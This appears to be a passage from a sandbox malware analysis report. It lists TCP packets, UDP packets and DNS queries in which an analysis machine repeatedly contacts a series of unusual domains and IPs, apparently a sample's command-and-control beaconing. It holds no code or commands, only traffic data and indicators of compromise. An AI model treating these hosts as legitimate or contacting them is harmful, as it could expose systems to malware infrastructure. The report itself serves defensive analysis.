                                                          Jul 26, 2024 18:47:06.914822102 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914830923 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.915483952 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.915538073 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:07.105624914 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.143713951 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.148977995 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:08.156569004 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.180576086 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.185894966 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:08.186465979 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.166889906 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167099953 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167110920 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167222977 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.168064117 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.168075085 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.168112993 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169152021 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169162035 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169171095 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169205904 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169205904 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169941902 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169996023 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.684549093 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.719513893 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.724647999 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:10.728739023 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.756584883 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.761522055 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.013639927 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.013736963 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.016782045 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:12.028553963 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:12.033586025 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:17.109901905 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.118227005 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:17.118298054 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.141370058 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.149327993 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.091609955 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.123343945 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.124603987 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:18.128036022 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.128537893 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:18.652079105 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.696734905 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.704792023 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:19.704864025 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.727794886 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.744875908 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.695777893 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.696382046 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.696767092 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:21.246345997 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.281121969 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.286169052 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:22.286591053 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.308600903 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.314038038 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:22.314116001 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454579115 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454612017 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454663038 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:23.833961010 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.862626076 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.873303890 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:24.873579979 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.889914036 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.896066904 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866499901 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866578102 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866655111 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:25.874594927 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:25.879487991 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:30.948569059 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:30.956262112 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:30.956331015 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:30.980041027 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:31.008711100 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.941521883 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.941637039 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.947607040 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:32.496642113 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.533226013 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.542100906 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:33.542161942 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.567893982 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.575824976 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.529320002 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.529465914 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.532500982 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:35.076366901 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.107513905 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.115241051 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:36.119373083 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.140595913 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.145523071 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:36.146802902 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.379759073 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.379942894 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.380006075 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:37.652192116 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.685007095 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.690542936 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:38.692708015 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.712620974 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.717675924 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672660112 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672688961 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672804117 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:39.680701971 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:39.686975002 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:44.740606070 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.762044907 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:44.768502951 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.784499884 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.789555073 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465374947 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465393066 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465401888 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465445995 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.467727900 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.467737913 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.467763901 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.471170902 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.471180916 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.471225977 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.474961042 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.474972963 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.474999905 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.478755951 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.478769064 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.478796005 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.485028028 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.485040903 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.485080004 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.525516987 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.554532051 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555249929 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555294991 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.555708885 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555752039 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:46.294905901 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.336883068 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.344954967 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.345031023 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.378555059 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.384574890 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.980654001 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.981376886 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.981389046 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.982873917 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.984262943 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.984273911 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987487078 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987498045 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987514019 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.988540888 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.990753889 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.990765095 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.993859053 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.993885994 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.994389057 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.995549917 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.995573997 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:48.000628948 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:48.074939966 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:48.075557947 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:48.076062918 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:48.076204062 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:48.888653040 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:49.922677994 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:49.930632114 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:49.930711031 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:49.961024046 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:49.985635996 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.015510082 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.654274940 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.655075073 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.655103922 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.657850027 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.657866955 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.660516977 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.661066055 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.661083937 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.664283037 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.664299011 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.664313078 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.664319038 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.664386034 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.664386034 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.667285919 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.668437004 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.668627977 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.669495106 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.716630936 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:50.744970083 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.745417118 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.745877981 CEST8055165162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:50.751108885 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:51.464869976 CEST5516580192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:52.500526905 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:52.505420923 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:52.505516052 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:52.552531004 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:52.557490110 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.160244942 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.160916090 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.160928965 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.160947084 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.164319038 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.164331913 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.164351940 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.166889906 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.166903973 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.166927099 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.169164896 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.169177055 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.169195890 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.171744108 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.171756029 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.171771049 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.174278975 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.174292088 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.174309969 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.228650093 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.250940084 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.251430988 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.251502037 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.251656055 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:53.251683950 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.261449099 CEST5516680192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:53.266177893 CEST8055166162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:58.320648909 CEST5516780192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:47:58.328293085 CEST8055167142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:47:58.328389883 CEST5516780192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:47:58.348274946 CEST5516780192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:47:58.353389978 CEST8055167142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:47:58.931396008 CEST8055167142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:47:58.931451082 CEST8055167142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:47:58.931739092 CEST5516780192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:47:59.855313063 CEST5516780192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:48:01.404455900 CEST5516880192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:48:01.410311937 CEST8055168142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:48:01.411946058 CEST5516880192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:48:01.433706045 CEST5516880192.168.2.5142.171.29.133
                                                          Jul 26, 2024 18:48:01.438515902 CEST8055168142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:48:02.001708031 CEST8055168142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:48:02.001805067 CEST8055168142.171.29.133192.168.2.5
                                                          Jul 26, 2024 18:48:02.001863956 CEST5516880192.168.2.5142.171.29.133

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 26, 2024 18:45:19.017045975 CEST53537131.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:45:20.596808910 CEST53524531.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:45:50.269546986 CEST5117653192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:45:50.651097059 CEST53511761.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:11.850596905 CEST5675053192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:11.922832966 CEST53567501.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:25.201191902 CEST6313253192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:26.213613033 CEST6313253192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:26.826675892 CEST53631321.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:26.826783895 CEST53631321.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:29.879143953 CEST6323953192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:30.873960972 CEST6323953192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:31.060903072 CEST53632391.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:31.060947895 CEST53632391.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:36.095433950 CEST6029153192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:36.111792088 CEST53602911.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:46:49.577018976 CEST6336653192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:46:49.629254103 CEST53633661.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:47:02.961139917 CEST5187453192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:47:02.979382038 CEST53518741.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:47:17.052340031 CEST6374253192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:47:17.100346088 CEST53637421.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:47:30.906625032 CEST6360053192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:47:30.939110041 CEST53636001.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:47:44.703351974 CEST5648453192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:47:44.730062962 CEST53564841.1.1.1192.168.2.5
                                                          Jul 26, 2024 18:47:58.295202017 CEST6305353192.168.2.51.1.1.1
                                                          Jul 26, 2024 18:47:58.309937000 CEST53630531.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 26, 2024 18:45:50.269546986 CEST192.168.2.51.1.1.10x9870Standard query (0)www.toppersbusiness.netA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:11.850596905 CEST192.168.2.51.1.1.10xcf28Standard query (0)www.rajveena.onlineA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:25.201191902 CEST192.168.2.51.1.1.10xa4a3Standard query (0)www.76716e97778bac2e.comA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:26.213613033 CEST192.168.2.51.1.1.10xa4a3Standard query (0)www.76716e97778bac2e.comA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:29.879143953 CEST192.168.2.51.1.1.10x4d3fStandard query (0)www.76716e97778bac2e.comA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:30.873960972 CEST192.168.2.51.1.1.10x4d3fStandard query (0)www.76716e97778bac2e.comA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:36.095433950 CEST192.168.2.51.1.1.10xc0Standard query (0)www.pqnqxn.xyzA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:49.577018976 CEST192.168.2.51.1.1.10xec1aStandard query (0)www.lovezi.shopA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:02.961139917 CEST192.168.2.51.1.1.10x4694Standard query (0)www.artfulfusionhub.latA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:17.052340031 CEST192.168.2.51.1.1.10xf749Standard query (0)www.9muyiutyt.onlineA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:30.906625032 CEST192.168.2.51.1.1.10x7075Standard query (0)www.suntextmeetings.onlineA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:44.703351974 CEST192.168.2.51.1.1.10xbb2dStandard query (0)www.gridban.xyzA (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:58.295202017 CEST192.168.2.51.1.1.10xdf0aStandard query (0)www.xawcfzcql9tcvj.shopA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 26, 2024 18:45:50.651097059 CEST1.1.1.1192.168.2.50x9870No error (0)www.toppersbusiness.nettoppersbusiness.netCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:45:50.651097059 CEST1.1.1.1192.168.2.50x9870No error (0)toppersbusiness.net178.212.35.248A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:11.922832966 CEST1.1.1.1192.168.2.50xcf28No error (0)www.rajveena.onlinerajveena.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:46:11.922832966 CEST1.1.1.1192.168.2.50xcf28No error (0)rajveena.online84.32.84.32A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:36.111792088 CEST1.1.1.1192.168.2.50xc0No error (0)www.pqnqxn.xyz104.21.59.240A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:36.111792088 CEST1.1.1.1192.168.2.50xc0No error (0)www.pqnqxn.xyz172.67.185.114A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:46:49.629254103 CEST1.1.1.1192.168.2.50xec1aNo error (0)www.lovezi.shoplovezi.shopCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:46:49.629254103 CEST1.1.1.1192.168.2.50xec1aNo error (0)lovezi.shop84.32.84.32A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:02.979382038 CEST1.1.1.1192.168.2.50x4694No error (0)www.artfulfusionhub.lat188.114.96.3A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:02.979382038 CEST1.1.1.1192.168.2.50x4694No error (0)www.artfulfusionhub.lat188.114.97.3A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:17.100346088 CEST1.1.1.1192.168.2.50xf749No error (0)www.9muyiutyt.online8fyhweb.xaomenlebo008.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:47:17.100346088 CEST1.1.1.1192.168.2.50xf749No error (0)8fyhweb.xaomenlebo008.com8fyhback.javalebogame008.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:47:17.100346088 CEST1.1.1.1192.168.2.50xf749No error (0)8fyhback.javalebogame008.com154.218.3.243A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:30.939110041 CEST1.1.1.1192.168.2.50x7075No error (0)www.suntextmeetings.onlinesuntextmeetings.onlineCNAME (Canonical name)IN (0x0001)false
